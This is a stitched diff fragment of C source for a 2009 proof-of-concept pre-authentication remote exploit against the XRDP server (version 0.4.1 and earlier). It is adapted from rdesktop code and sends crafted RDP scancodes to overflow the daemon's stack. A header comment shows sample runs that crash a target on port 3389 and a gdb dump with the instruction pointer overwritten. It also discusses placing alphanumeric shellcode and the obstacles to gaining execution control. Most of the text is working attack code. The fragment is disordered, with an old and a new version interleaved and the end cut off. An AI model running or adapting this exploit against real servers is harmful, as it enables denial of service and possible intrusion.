BN_bn2bin(&y, out); - reverse(out, outlen); - if (outlen < SEC_MODULUS_SIZE) - memset(out + outlen, 0, SEC_MODULUS_SIZE - outlen); - - BN_free(&y); - BN_clear_free(&x); - BN_free(&exp); - BN_free(&mod); - BN_CTX_free(ctx); -} - -/* Initialise secure transport packet */ -STREAM -sec_init(uint32 flags, int maxlen) -{ - int hdrlen; - STREAM s; - - if (!licence_issued) - hdrlen = (flags & SEC_ENCRYPT) ? 12 : 4; - else - hdrlen = (flags & SEC_ENCRYPT) ? 12 : 0; - s = mcs_init(maxlen + hdrlen); - s_push_layer(s, sec_hdr, hdrlen); - - return s; -} - - - - -/* Output connect initial data blob */ -static void -sec_out_mcs_data(STREAM s) -{ - int hostlen = 2 * strlen(hostname); - - if (hostlen > 30) - hostlen = 30; - - out_uint16_be(s, 5); /* unknown */ - out_uint16_be(s, 0x14); - out_uint8(s, 0x7c); - out_uint16_be(s, 1); - - out_uint16_be(s, (158 | 0x8000)); /* remaining length */ - - out_uint16_be(s, 8); /* length? */ - out_uint16_be(s, 16); - out_uint8(s, 0); - out_uint16_le(s, 0xc001); - out_uint8(s, 0); - - out_uint32_le(s, 0x61637544); /* "Duca" ?! */ - out_uint16_be(s, (144 | 0x8000)); /* remaining length */ - - /* Client information */ - out_uint16_le(s, SEC_TAG_CLI_INFO); - out_uint16_le(s, 136); /* length */ - out_uint16_le(s, 1); - out_uint16_le(s, 8); - out_uint16_le(s, width); - out_uint16_le(s, height); - out_uint16_le(s, 0xca01); - out_uint16_le(s, 0xaa03); - out_uint32_le(s, keylayout); - out_uint32_le(s, 419); /* client build? we are 419 compatible :-) */ - - /* Unicode name of client, padded to 32 bytes */ - rdp_out_unistr(s, hostname, hostlen); - out_uint8s(s, 30 - hostlen); - - out_uint32_le(s, 4); - out_uint32(s, 0); - out_uint32_le(s, 12); - out_uint8s(s, 64); /* reserved? 4 + 12 doublewords */ - - out_uint16_le(s, 0xca01); - out_uint16(s, 0); - - /* Client encryption settings */ - out_uint16_le(s, SEC_TAG_CLI_CRYPT); - out_uint16_le(s, 8); /* length */ - out_uint32_le(s, encryption ? 0x3 : 0); /* encryption supported, 128-bit supported */ - s_mark_end(s); -} - -/* Parse a public key structure */ -static BOOL -sec_parse_public_key(STREAM s, uint8 ** modulus, uint8 ** exponent) -{ - uint32 magic, modulus_len; - - in_uint32_le(s, magic); - if (magic != SEC_RSA_MAGIC) - { - error("RSA magic 0x%x\n", magic); - return False; - } - - in_uint32_le(s, modulus_len); - if (modulus_len != SEC_MODULUS_SIZE + SEC_PADDING_SIZE) - { - error("modulus len 0x%x\n", modulus_len); - return False; - } - - in_uint8s(s, 8); /* modulus_bits, unknown */ - in_uint8p(s, *exponent, SEC_EXPONENT_SIZE); - in_uint8p(s, *modulus, SEC_MODULUS_SIZE); - in_uint8s(s, SEC_PADDING_SIZE); - - return s_check(s); -} - -/* Parse a crypto information structure */ -static BOOL -sec_parse_crypt_info(STREAM s, uint32 * rc4_key_size, - uint8 ** server_random, uint8 ** modulus, uint8 ** exponent) -{ - uint32 crypt_level, random_len, rsa_info_len; - uint16 tag, length; - uint8 *next_tag, *end; - - in_uint32_le(s, *rc4_key_size); /* 1 = 40-bit, 2 = 128-bit */ - in_uint32_le(s, crypt_level); /* 1 = low, 2 = medium, 3 = high */ - if (crypt_level == 0) /* no encryptation */ - return False; - in_uint32_le(s, random_len); - in_uint32_le(s, rsa_info_len); - - if (random_len != SEC_RANDOM_SIZE) - { - error("random len %d\n", random_len); - return False; - } - - in_uint8p(s, *server_random, random_len); - - /* RSA info */ - end = s->p + rsa_info_len; - if (end > s->end) - return False; - - in_uint8s(s, 12); /* unknown */ - - while (s->p < end) - { - in_uint16_le(s, tag); - in_uint16_le(s, length); - - next_tag = s->p + length; - - switch (tag) - { - case SEC_TAG_PUBKEY: - if (!sec_parse_public_key(s, modulus, exponent)) - return False; - - break; - - case SEC_TAG_KEYSIG: - /* Is this a Microsoft key that we just got? */ - /* Care factor: zero! */ - break; - } - - s->p = next_tag; - } - - return s_check_end(s); -} - -/* Process crypto information blob */ -static void -sec_process_crypt_info(STREAM s) -{ - uint8 *server_random, *modulus, *exponent; - uint8 client_random[SEC_RANDOM_SIZE]; - uint32 rc4_key_size; - - if (!sec_parse_crypt_info(s, &rc4_key_size, &server_random, &modulus, &exponent)) - return; - - /* Generate a client random, and hence determine encryption keys */ - sec_rsa_encrypt(sec_crypted_random, client_random, SEC_RANDOM_SIZE, modulus, exponent); - sec_generate_keys(client_random, server_random, rc4_key_size); -} - -/* Process connect response data blob */ -static void -sec_process_mcs_data(STREAM s) -{ - uint16 tag, length; - uint8 *next_tag; - uint8 len; - - in_uint8s(s, 21); /* header */ - in_uint8(s, len); - if (len & 0x80) - in_uint8(s, len); - - while (s->p < s->end) - { - in_uint16_le(s, tag); - in_uint16_le(s, length); - - if (length <= 4) - return; - - next_tag = s->p + length - 4; - - switch (tag) - { - case SEC_TAG_SRV_INFO: - case SEC_TAG_SRV_3: - break; - - case SEC_TAG_SRV_CRYPT: - sec_process_crypt_info(s); - break; - } - - s->p = next_tag; - } -} - -/* Receive secure transport packet */ -STREAM -sec_recv(void) -{ - uint32 sec_flags; - STREAM s; - - while ((s = mcs_recv()) != NULL) - { - if (encryption || !licence_issued) - { - in_uint32_le(s, sec_flags); - - if (sec_flags & SEC_LICENCE_NEG) - { - licence_process(s); - continue; - } - - if (sec_flags & SEC_ENCRYPT) - { - in_uint8s(s, 8); /* signature */ - - } - } - - return s; - } - - return NULL; -} - -/* Establish a secure connection */ -BOOL -sec_connect(char *server) -{ - struct stream mcs_data; - - /* We exchange some RDP data during the MCS-Connect */ - mcs_data.size = 512; - mcs_data.p = mcs_data.data = xmalloc(mcs_data.size); - sec_out_mcs_data(&mcs_data); - - if (!mcs_connect(server, &mcs_data)) - return False; - - sec_process_mcs_data(&mcs_data); - - xfree(mcs_data.data); - return True; -} - -/* Disconnect a connection */ -void -sec_disconnect(void) -{ - mcs_disconnect(); -} - - -/* Initialise TCP transport data packet */ -STREAM -tcp_init(int maxlen) -{ - if (maxlen > out.size) - { - out.size = maxlen; - } - - out.p = out.data; - out.end = out.data + out.size; - return &out; -} - -/* Send TCP transport data packet */ -void -tcp_send(STREAM s) -{ - int length = s->end - s->data; - int sent, total = 0; - - while (total < length) - { - sent = send(sock, s->data + total, length - total, 0); - if (sent <= 0) - { - fprintf(stderr, "\n[=] Check port 3389 on target host. It should be offline.\n\n"); - return; - } - - total += sent; - } -} - -/* Receive a message on the TCP layer */ -STREAM -tcp_recv(int length) -{ - int rcvd = 0; - - if (length > in.size) - { - - in.size = length; - } - - in.end = in.p = in.data; - - while (length > 0) - { - if (!ui_select(sock)) - /* User quit */ - return NULL; - - rcvd = recv(sock, in.end, length, 0); - if (rcvd == -1) - { - error("recv: %s", strerror(errno)); - return NULL; - } - - in.end += rcvd; - length -= rcvd; - } - - return ∈ -} - -/* Establish a connection on the TCP layer */ -BOOL -tcp_connect(char *server) -{ - struct hostent *nslookup; - struct sockaddr_in servaddr; - int true = 1; - - if ((nslookup = gethostbyname(server)) != NULL) - { - memcpy(&servaddr.sin_addr, nslookup->h_addr, sizeof(servaddr.sin_addr)); - } - else if ((servaddr.sin_addr.s_addr = inet_addr(server)) == INADDR_NONE) - { - error("%s: unable to resolve host\n", server); - return False; - } - - if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) - { - error("socket: %s\n", strerror(errno)); - return False; - } - - servaddr.sin_family = AF_INET; - servaddr.sin_port = htons(tcp_port_rdp); - - if (connect(sock, (struct sockaddr *) &servaddr, sizeof(struct sockaddr)) < 0) - { - error("connect: %s\n", strerror(errno)); - close(sock); - return False; - } - - setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (void *) &true, sizeof(true)); - - in.size = 4096; - in.data = xmalloc(in.size); - - out.size = 4096; - out.data = xmalloc(out.size); - - return True; -} - -/* Disconnect on the TCP layer */ -void -tcp_disconnect(void) -{ - fprintf(stderr, "\n[=] Done. Check port 3389 on the remote host.\n\n"); - close(sock); -} - - - -/* Returns 0 after user quit, 1 otherwise */ -int -ui_select(int rdp_socket) -{ - int n = (rdp_socket > x_socket) ? rdp_socket + 1 : x_socket + 1; - fd_set rfds; - - - -// Begin PoC mods - XEvent xevent; - KeySym keysym; - uint32 ev_time; - key_translation tr; - if (ix-- >= 0) - { return 1; } - ev_time = time(NULL); - handle_special_keys(keysym, xevent.xkey.state, ev_time, True); - tr = xkeymap_translate_key(keysym, xevent.xkey.keycode, xevent.xkey.state); - ensure_remote_modifiers(ev_time, tr); - rdp_send_scancode(ev_time, RDP_KEYPRESS, tr.scancode); -// End PoC mods - - - - FD_ZERO(&rfds); - while (True) - { - /* Process any events already waiting */ - -// if (!xwin_process_events()) -// /* User quit */ -// return 0; - - FD_ZERO(&rfds); - FD_SET(rdp_socket, &rfds); - FD_SET(x_socket, &rfds); - - switch (select(n, &rfds, NULL, NULL, NULL)) - { - case -1: - error("select: %s\n", strerror(errno)); - - case 0: - continue; - } - - if (FD_ISSET(rdp_socket, &rfds)) - return 1; - } -} - - -key_translation -xkeymap_translate_key(uint32 keysym, unsigned int keycode, unsigned int state) -{ - key_translation tr = { 0, 0 }; - - tr = keymap[keysym & KEYMAP_MASK]; - - if (tr.modifiers & MapInhibitMask) - { - - tr.scancode = 0; - return tr; - } - - if (tr.modifiers & MapLocalStateMask) - { - /* The modifiers to send for this key should be obtained - from the local state. Currently, only shift is implemented. */ - if (state & ShiftMask) - { - tr.modifiers = MapLeftShiftMask; - } - } - - if (tr.scancode != 0) - { - return tr; - } - - if (keymap_loaded) - - - /* not in keymap, try to interpret the raw scancode */ - if ((keycode >= min_keycode) && (keycode <= 0x60)) - { - tr.scancode = keycode - min_keycode; - - /* The modifiers to send for this key should be - obtained from the local state. Currently, only - shift is implemented. */ - if (state & ShiftMask) - { - tr.modifiers = MapLeftShiftMask; - } - - - } - else - { - - } - - return tr; -} - - -static void -update_modifier_state(uint8 scancode, BOOL pressed) -{ -#ifdef WITH_DEBUG_KBD - uint16 old_modifier_state; - - old_modifier_state = remote_modifier_state; -#endif - - switch (scancode) - { - case SCANCODE_CHAR_LSHIFT: - MASK_CHANGE_BIT(remote_modifier_state, MapLeftShiftMask, pressed); - break; - case SCANCODE_CHAR_RSHIFT: - MASK_CHANGE_BIT(remote_modifier_state, MapRightShiftMask, pressed); - break; - case SCANCODE_CHAR_LCTRL: - MASK_CHANGE_BIT(remote_modifier_state, MapLeftCtrlMask, pressed); - break; - case SCANCODE_CHAR_RCTRL: - MASK_CHANGE_BIT(remote_modifier_state, MapRightCtrlMask, pressed); - break; - case SCANCODE_CHAR_LALT: - MASK_CHANGE_BIT(remote_modifier_state, MapLeftAltMask, pressed); - break; - case SCANCODE_CHAR_RALT: - MASK_CHANGE_BIT(remote_modifier_state, MapRightAltMask, pressed); - break; - case SCANCODE_CHAR_LWIN: - MASK_CHANGE_BIT(remote_modifier_state, MapLeftWinMask, pressed); - break; - case SCANCODE_CHAR_RWIN: - MASK_CHANGE_BIT(remote_modifier_state, MapRightWinMask, pressed); - break; - case SCANCODE_CHAR_NUMLOCK: - /* KeyReleases for NumLocks are sent immediately. Toggle the - modifier state only on Keypress */ - if (pressed) - { - BOOL newNumLockState; - newNumLockState = - (MASK_HAS_BITS - (remote_modifier_state, MapNumLockMask) == False); - MASK_CHANGE_BIT(remote_modifier_state, - MapNumLockMask, newNumLockState); - } - break; - } - -#ifdef WITH_DEBUG_KBD - if (old_modifier_state != remote_modifier_state) - { - - old_modifier_state, pressed)); - - } -#endif - -} - - -/* free */ -void -xfree(void *mem) -{ - free(mem); -} - -/* report an error */ -void -error(char *format, ...) -{ - va_list ap; - - fprintf(stderr, "[=] Error: "); - - va_start(ap, format); - vfprintf(stderr, format, ap); - va_end(ap); -} - - - -/* malloc; exit if out of memory */ -void * -xmalloc(int size) -{ - void *mem = malloc(size); - if (mem == NULL) - { - error("xmalloc %d\n", size); - exit(1); - } - return mem; -} - -// milw0rm.com [2009-04-17] +/* + + XRDP <= 0.4.1 pre-auth remote PoC exploit. (xrdp.sourceforge.net) + +******************************************************************************** + + 01:59:56 root@crateria:~/xrdp# gcc -w -lssl -lX11 xrdp-poc.c -o xrdp-poc + 02:00:29 root@crateria:~/xrdp# ./xrdp-poc 10.0.0.13 + + [=] Connected to 10.0.0.13 + [=] Hit CTRL-C if the progress bar stops. + + Be patient! It takes about a minute, the RDP packets + need to be sent spaced apart or the daemon discards them. + + [=] Progress: ******************************************************* + [=] Check port 3389 on target host. It should be offline. + + ~/~ + + [root@norfair xrdp]# cat /etc/issue + CentOS release 4.7 (Final) + [root@norfair xrdp]# ./xrdp -nodaemon + Segmentation fault (core dumped) + +******************************************************************************** + + Quick description of the exploit: + + This is a PoC remote exploit for the XRDP vulnerability found by Hamid Ebadi. + XRDP 0.4.1 is the latest version at the time of this writing. This is *almost* + a really cool exploit, but execution control is difficult to achieve because: + + 1 - The XRDP daemon only accepts valid rdp scancodes as input. (ie, not ASCII + codes, but rdp scancodes that are later translated to ASCII after validation). + This isn't a huge problem. I was able write alpha-numeric shellcode onto the + stack. However, I wasn't able to find any alpha-numeric return addresses we + can use to overwrite the saved EIP, at least on the distros I examined + (Ubuntu 8.10 and CentOS 4.7). There may be distros where this isn't the case. + + 2 - On systems with gcc versions greater than 3.4 (realistically most Linux + boxes today, Ubuntu 8.10 uses 4.3.2), gcc's -O2 option (which xrdp's + Makefile includes) enables _FORTIFY_SOURCE checks, which stop you cold. On + older distros like CentOS 4.7 (gcc 3.4.6), we can successfully overwrite EIP: + + #7 0x61616161 in ?? () + #8 0x61616161 in ?? () + #9 0xb7f59200 in ?? () + #10 0x0804db1e in xrdp_bitmap_def_proc (self=Cannot access memory + at address 0x61616169) at xrdp_bitmap.c:1482 + Previous frame inner to this frame (corrupt stack?) + + #0 0x61616161 in ?? () + (gdb) i r + eax 0x0 0 + ecx 0x8fda860 150841440 + edx 0x97d858 9951320 + ebx 0x61616161 1633771873 + esp 0xb7f59208 0xb7f59208 + ebp 0x61616161 0x61616161 + esi 0x61616161 1633771873 + edi 0x61616161 1633771873 + eip 0x61616161 0x61616161 + + But due to the alpha-numeric requirements for the return address, again, + no dice. Most of the code itself was taken from rdesktop, by Matthew Chapman. + Basically we hack rdesktop to bypass all X-windows interaction, then in + rdp_send_scancode(), we are able to build our payload. If you manage to find + an alternate way to control EIP, drop me a line. + joewalko@gmail.com + +******************************************************************************** +*/ + +#include /* inet_addr */ +#include +#include +#include /* errno */ +#include /* save licence uses it. */ +#include /* open */ +#include +#include /* gethostbyname */ +#include /* sockaddr_in */ +#include /* TCP_NODELAY */ +#include +#include +#include +#include +#include /* getpwuid */ +#include /* va_list va_start va_end */ +#include +#include +#include +#include /* socket connect */ +#include /* socket connect setsockopt */ +#include /* stat */ +#include /* gettimeofday */ +#include /* timeval */ +#include /* times */ +#include /* sockaddr_un */ +#include /* tcgetattr tcsetattr */ +#include +#include /* read close getuid getgid getpid getppid gethostname */ +#include /* select read write close */ +#include +#include +#include + + +//Begin typedefs and structs +typedef int BOOL; +#ifndef True +#define True (1) +#define False (0) +#endif +typedef unsigned char uint8; +typedef signed char sint8; +typedef unsigned short uint16; +typedef signed short sint16; +typedef unsigned int uint32; +typedef signed int sint32; +typedef void *HBITMAP; +typedef void *HGLYPH; +typedef void *HCOLOURMAP; +typedef void *HCURSOR; + +typedef struct _COLOURENTRY +{ + uint8 red; + uint8 green; + uint8 blue; + +} +COLOURENTRY; + +typedef struct _COLOURMAP +{ + uint16 ncolours; + COLOURENTRY *colours; + +} +COLOURMAP; + +typedef struct _BOUNDS +{ + uint16 left; + uint16 top; + uint16 right; + uint16 bottom; + +} +BOUNDS; + +typedef struct _PEN +{ + uint8 style; + uint8 width; + uint8 colour; + +} +PEN; + +typedef struct _BRUSH +{ + uint8 xorigin; + uint8 yorigin; + uint8 style; + uint8 pattern[8]; + +} +BRUSH; + +typedef struct _FONTGLYPH +{ + sint16 offset; + sint16 baseline; + uint16 width; + uint16 height; + HBITMAP pixmap; + +} +FONTGLYPH; + +typedef struct _DATABLOB +{ + void *data; + int size; + +} +DATABLOB; + +typedef struct _key_translation +{ + uint8 scancode; + uint16 modifiers; +} +key_translation; + +/* TCP port for Remote Desktop Protocol */ +#define TCP_PORT_RDP 3389 + +/* ISO PDU codes */ +enum ISO_PDU_CODE +{ + ISO_PDU_CR = 0xE0, /* Connection Request */ + ISO_PDU_CC = 0xD0, /* Connection Confirm */ + ISO_PDU_DR = 0x80, /* Disconnect Request */ + ISO_PDU_DT = 0xF0, /* Data */ + ISO_PDU_ER = 0x70 /* Error */ +}; + +/* MCS PDU codes */ +enum MCS_PDU_TYPE +{ + MCS_EDRQ = 1, /* Erect Domain Request */ + MCS_DPUM = 8, /* Disconnect Provider Ultimatum */ + MCS_AURQ = 10, /* Attach User Request */ + MCS_AUCF = 11, /* Attach User Confirm */ + MCS_CJRQ = 14, /* Channel Join Request */ + MCS_CJCF = 15, /* Channel Join Confirm */ + MCS_SDRQ = 25, /* Send Data Request */ + MCS_SDIN = 26 /* Send Data Indication */ +}; + +#define MCS_CONNECT_INITIAL 0x7f65 +#define MCS_CONNECT_RESPONSE 0x7f66 +#define BER_TAG_BOOLEAN 1 +#define BER_TAG_INTEGER 2 +#define BER_TAG_OCTET_STRING 4 +#define BER_TAG_RESULT 10 +#define MCS_TAG_DOMAIN_PARAMS 0x30 +#define MCS_GLOBAL_CHANNEL 1003 + +/* RDP secure transport constants */ +#define SEC_RANDOM_SIZE 32 +#define SEC_MODULUS_SIZE 64 +#define SEC_PADDING_SIZE 8 +#define SEC_EXPONENT_SIZE 4 +#define SEC_CLIENT_RANDOM 0x0001 +#define SEC_ENCRYPT 0x0008 +#define SEC_LOGON_INFO 0x0040 +#define SEC_LICENCE_NEG 0x0080 +#define SEC_TAG_SRV_INFO 0x0c01 +#define SEC_TAG_SRV_CRYPT 0x0c02 +#define SEC_TAG_SRV_3 0x0c03 +#define SEC_TAG_CLI_INFO 0xc001 +#define SEC_TAG_CLI_CRYPT 0xc002 +#define SEC_TAG_PUBKEY 0x0006 +#define SEC_TAG_KEYSIG 0x0008 +#define SEC_RSA_MAGIC 0x31415352 /* RSA1 */ + +/* RDP licensing constants */ +#define LICENCE_TOKEN_SIZE 10 +#define LICENCE_HWID_SIZE 20 +#define LICENCE_SIGNATURE_SIZE 16 +#define LICENCE_TAG_DEMAND 0x0201 +#define LICENCE_TAG_AUTHREQ 0x0202 +#define LICENCE_TAG_ISSUE 0x0203 +#define LICENCE_TAG_REISSUE 0x0204 +#define LICENCE_TAG_PRESENT 0x0212 +#define LICENCE_TAG_REQUEST 0x0213 +#define LICENCE_TAG_AUTHRESP 0x0215 +#define LICENCE_TAG_RESULT 0x02ff +#define LICENCE_TAG_USER 0x000f +#define LICENCE_TAG_HOST 0x0010 + +/* RDP PDU codes */ +enum RDP_PDU_TYPE +{ + RDP_PDU_DEMAND_ACTIVE = 1, + RDP_PDU_CONFIRM_ACTIVE = 3, + RDP_PDU_DEACTIVATE = 6, + RDP_PDU_DATA = 7 +}; + +enum RDP_DATA_PDU_TYPE +{ + RDP_DATA_PDU_UPDATE = 2, + RDP_DATA_PDU_CONTROL = 20, + RDP_DATA_PDU_POINTER = 27, + RDP_DATA_PDU_INPUT = 28, + RDP_DATA_PDU_SYNCHRONISE = 31, + RDP_DATA_PDU_BELL = 34, + RDP_DATA_PDU_LOGON = 38, + RDP_DATA_PDU_FONT2 = 39 +}; + +enum RDP_CONTROL_PDU_TYPE +{ + RDP_CTL_REQUEST_CONTROL = 1, + RDP_CTL_GRANT_CONTROL = 2, + RDP_CTL_DETACH = 3, + RDP_CTL_COOPERATE = 4 +}; + +enum RDP_UPDATE_PDU_TYPE +{ + RDP_UPDATE_ORDERS = 0, + RDP_UPDATE_BITMAP = 1, + RDP_UPDATE_PALETTE = 2, + RDP_UPDATE_SYNCHRONIZE = 3 +}; + +enum RDP_POINTER_PDU_TYPE +{ + RDP_POINTER_MOVE = 3, + RDP_POINTER_COLOR = 6, + RDP_POINTER_CACHED = 7 +}; + +enum RDP_INPUT_DEVICE +{ + RDP_INPUT_SYNCHRONIZE = 0, + RDP_INPUT_CODEPOINT = 1, + RDP_INPUT_VIRTKEY = 2, + RDP_INPUT_SCANCODE = 4, + RDP_INPUT_MOUSE = 0x8001 +}; + +/* Device flags */ +#define KBD_FLAG_RIGHT 0x0001 +#define KBD_FLAG_EXT 0x0100 +#define KBD_FLAG_QUIET 0x1000 +#define KBD_FLAG_DOWN 0x4000 +#define KBD_FLAG_UP 0x8000 + +/* These are for synchronization; not for keystrokes */ +#define KBD_FLAG_SCROLL 0x0001 +#define KBD_FLAG_NUMLOCK 0x0002 +#define KBD_FLAG_CAPITAL 0x0004 + +/* See T.128 */ +#define RDP_KEYPRESS 0 +#define RDP_KEYRELEASE (KBD_FLAG_DOWN | KBD_FLAG_UP) +#define MOUSE_FLAG_MOVE 0x0800 +#define MOUSE_FLAG_BUTTON1 0x1000 +#define MOUSE_FLAG_BUTTON2 0x2000 +#define MOUSE_FLAG_BUTTON3 0x4000 +#define MOUSE_FLAG_BUTTON4 0x0280 +#define MOUSE_FLAG_BUTTON5 0x0380 +#define MOUSE_FLAG_DOWN 0x8000 + +/* Raster operation masks */ +#define ROP2_S(rop3) (rop3 & 0xf) +#define ROP2_P(rop3) ((rop3 & 0x3) | ((rop3 & 0x30) >> 2)) +#define ROP2_COPY 0xc +#define ROP2_XOR 0x6 +#define ROP2_AND 0x8 +#define ROP2_NXOR 0x9 +#define ROP2_OR 0xe +#define MIX_TRANSPARENT 0 +#define MIX_OPAQUE 1 +#define TEXT2_VERTICAL 0x04 +#define TEXT2_IMPLICIT_X 0x20 + +/* RDP capabilities */ +#define RDP_CAPSET_GENERAL 1 +#define RDP_CAPLEN_GENERAL 0x18 +#define OS_MAJOR_TYPE_UNIX 4 +#define OS_MINOR_TYPE_XSERVER 7 +#define RDP_CAPSET_BITMAP 2 +#define RDP_CAPLEN_BITMAP 0x1C +#define RDP_CAPSET_ORDER 3 +#define RDP_CAPLEN_ORDER 0x58 +#define ORDER_CAP_NEGOTIATE 2 +#define ORDER_CAP_NOSUPPORT 4 +#define RDP_CAPSET_BMPCACHE 4 +#define RDP_CAPLEN_BMPCACHE 0x28 +#define RDP_CAPSET_CONTROL 5 +#define RDP_CAPLEN_CONTROL 0x0C +#define RDP_CAPSET_ACTIVATE 7 +#define RDP_CAPLEN_ACTIVATE 0x0C +#define RDP_CAPSET_POINTER 8 +#define RDP_CAPLEN_POINTER 0x08 +#define RDP_CAPSET_SHARE 9 +#define RDP_CAPLEN_SHARE 0x08 +#define RDP_CAPSET_COLCACHE 10 +#define RDP_CAPLEN_COLCACHE 0x08 +#define RDP_CAPSET_UNKNOWN 13 +#define RDP_CAPLEN_UNKNOWN 0x9C +#define RDP_SOURCE "MSTSC" + +/* Logon flags */ +#define RDP_LOGON_NORMAL 0x33 +#define RDP_LOGON_AUTO 0x8 + +/* Keymap flags */ +#define MapRightShiftMask (1<<0) +#define MapLeftShiftMask (1<<1) +#define MapShiftMask (MapRightShiftMask | MapLeftShiftMask) +#define MapRightAltMask (1<<2) +#define MapLeftAltMask (1<<3) +#define MapAltGrMask MapRightAltMask +#define MapRightCtrlMask (1<<4) +#define MapLeftCtrlMask (1<<5) +#define MapCtrlMask (MapRightCtrlMask | MapLeftCtrlMask) +#define MapRightWinMask (1<<6) +#define MapLeftWinMask (1<<7) +#define MapWinMask (MapRightWinMask | MapLeftWinMask) +#define MapNumLockMask (1<<8) +#define MapCapsLockMask (1<<9) +#define MapLocalStateMask (1<<10) +#define MapInhibitMask (1<<11) +#define MASK_ADD_BITS(var, mask) (var |= mask) +#define MASK_REMOVE_BITS(var, mask) (var &= ~mask) +#define MASK_HAS_BITS(var, mask) ((var & mask)>0) +#define MASK_CHANGE_BIT(var, mask, active) (var = ((var & ~mask) | (active ? mask : 0))) + +/* Parser state */ +typedef struct stream +{ + unsigned char *p; + unsigned char *end; + unsigned char *data; + unsigned int size; + + /* Offsets of various headers */ + unsigned char *iso_hdr; + unsigned char *mcs_hdr; + unsigned char *sec_hdr; + unsigned char *rdp_hdr; + +} + *STREAM; + +#define s_push_layer(s,h,n) { (s)->h = (s)->p; (s)->p += n; } +#define s_pop_layer(s,h) (s)->p = (s)->h; +#define s_mark_end(s) (s)->end = (s)->p; +#define s_check(s) ((s)->p <= (s)->end) +#define s_check_rem(s,n) ((s)->p + n <= (s)->end) +#define s_check_end(s) ((s)->p == (s)->end) +#if defined(L_ENDIAN) && !defined(NEED_ALIGN) +#define in_uint16_le(s,v) { v = *(uint16 *)((s)->p); (s)->p += 2; } +#define in_uint32_le(s,v) { v = *(uint32 *)((s)->p); (s)->p += 4; } +#define out_uint16_le(s,v) { *(uint16 *)((s)->p) = v; (s)->p += 2; } +#define out_uint32_le(s,v) { *(uint32 *)((s)->p) = v; (s)->p += 4; } +#else +#define in_uint16_le(s,v) { v = *((s)->p++); v += *((s)->p++) << 8; } +#define in_uint32_le(s,v) { in_uint16_le(s,v) \ + v += *((s)->p++) << 16; v += *((s)->p++) << 24; } +#define out_uint16_le(s,v) { *((s)->p++) = (v) & 0xff; *((s)->p++) = ((v) >> 8) & 0xff; } +#define out_uint32_le(s,v) { out_uint16_le(s, (v) & 0xffff); out_uint16_le(s, ((v) >> 16) & 0xffff); } +#endif +#if defined(B_ENDIAN) && !defined(NEED_ALIGN) +#define in_uint16_be(s,v) { v = *(uint16 *)((s)->p); (s)->p += 2; } +#define in_uint32_be(s,v) { v = *(uint32 *)((s)->p); (s)->p += 4; } +#define out_uint16_be(s,v) { *(uint16 *)((s)->p) = v; (s)->p += 2; } +#define out_uint32_be(s,v) { *(uint32 *)((s)->p) = v; (s)->p += 4; } +#define B_ENDIAN_PREFERRED +#define in_uint16(s,v) in_uint16_be(s,v) +#define in_uint32(s,v) in_uint32_be(s,v) +#define out_uint16(s,v) out_uint16_be(s,v) +#define out_uint32(s,v) out_uint32_be(s,v) +#else +#define next_be(s,v) v = ((v) << 8) + *((s)->p++); +#define in_uint16_be(s,v) { v = *((s)->p++); next_be(s,v); } +#define in_uint32_be(s,v) { in_uint16_be(s,v); next_be(s,v); next_be(s,v); } +#define out_uint16_be(s,v) { *((s)->p++) = ((v) >> 8) & 0xff; *((s)->p++) = (v) & 0xff; } +#define out_uint32_be(s,v) { out_uint16_be(s, ((v) >> 16) & 0xffff); out_uint16_be(s, (v) & 0xffff); } +#endif +#ifndef B_ENDIAN_PREFERRED +#define in_uint16(s,v) in_uint16_le(s,v) +#define in_uint32(s,v) in_uint32_le(s,v) +#define out_uint16(s,v) out_uint16_le(s,v) +#define out_uint32(s,v) out_uint32_le(s,v) +#endif +#define in_uint8(s,v) v = *((s)->p++); +#define in_uint8p(s,v,n) { v = (s)->p; (s)->p += n; } +#define in_uint8a(s,v,n) { memcpy(v,(s)->p,n); (s)->p += n; } +#define in_uint8s(s,n) (s)->p += n; +#define out_uint8(s,v) *((s)->p++) = v; +#define out_uint8p(s,v,n) { memcpy((s)->p,v,n); (s)->p += n; } +#define out_uint8a(s,v,n) out_uint8p(s,v,n); +#define out_uint8s(s,n) { memset((s)->p,0,n); (s)->p += n; } +#define SCANCODE_EXTENDED 0x80 +#define SCANCODE_KEY_44 0x2a +#define SCANCODE_CHAR_LSHIFT SCANCODE_KEY_44 +#define SCANCODE_KEY_57 0x36 +#define SCANCODE_CHAR_RSHIFT SCANCODE_KEY_57 +#define SCANCODE_KEY_58 0x1d +#define SCANCODE_CHAR_LCTRL SCANCODE_KEY_58 +#define SCANCODE_KEY_60 0x38 +#define SCANCODE_CHAR_LALT SCANCODE_KEY_60 +#define SCANCODE_KEY_62 (SCANCODE_EXTENDED | 0x38) +#define SCANCODE_CHAR_RALT SCANCODE_KEY_62 +#define SCANCODE_KEY_64 (SCANCODE_EXTENDED | 0x1d) +#define SCANCODE_CHAR_RCTRL SCANCODE_KEY_64 +#define SCANCODE_KEY_90 0x45 +#define SCANCODE_CHAR_NUMLOCK SCANCODE_KEY_90 +#define SCANCODE_KEY_110 0x1 +#define SCANCODE_CHAR_ESC SCANCODE_KEY_110 +#define SCANCODE_CHAR_LWIN (SCANCODE_EXTENDED | 0x5b) +#define SCANCODE_CHAR_RWIN (SCANCODE_EXTENDED | 0x5c) +#define s_push_layer(s,h,n) { (s)->h = (s)->p; (s)->p += n; } +#define s_pop_layer(s,h) (s)->p = (s)->h; +#define s_mark_end(s) (s)->end = (s)->p; +#define s_check(s) ((s)->p <= (s)->end) +#define s_check_rem(s,n) ((s)->p + n <= (s)->end) +#define s_check_end(s) ((s)->p == (s)->end) +#define RDP_ORDER_STANDARD 0x01 +#define RDP_ORDER_SECONDARY 0x02 +#define RDP_ORDER_BOUNDS 0x04 +#define RDP_ORDER_CHANGE 0x08 +#define RDP_ORDER_DELTA 0x10 +#define RDP_ORDER_LASTBOUNDS 0x20 +#define RDP_ORDER_SMALL 0x40 +#define RDP_ORDER_TINY 0x80 +#define MAX_TEXT 256 +#define MAX_DATA 256 + +enum RDP_ORDER_TYPE +{ + RDP_ORDER_DESTBLT = 0, + RDP_ORDER_PATBLT = 1, + RDP_ORDER_SCREENBLT = 2, + RDP_ORDER_LINE = 9, + RDP_ORDER_RECT = 10, + RDP_ORDER_DESKSAVE = 11, + RDP_ORDER_MEMBLT = 13, + RDP_ORDER_TRIBLT = 14, + RDP_ORDER_POLYLINE = 22, + RDP_ORDER_TEXT2 = 27 +}; + +typedef struct _POLYLINE_ORDER +{ + uint16 x; + uint16 y; + uint8 opcode; + uint8 fgcolour; + uint8 lines; + uint8 datasize; + 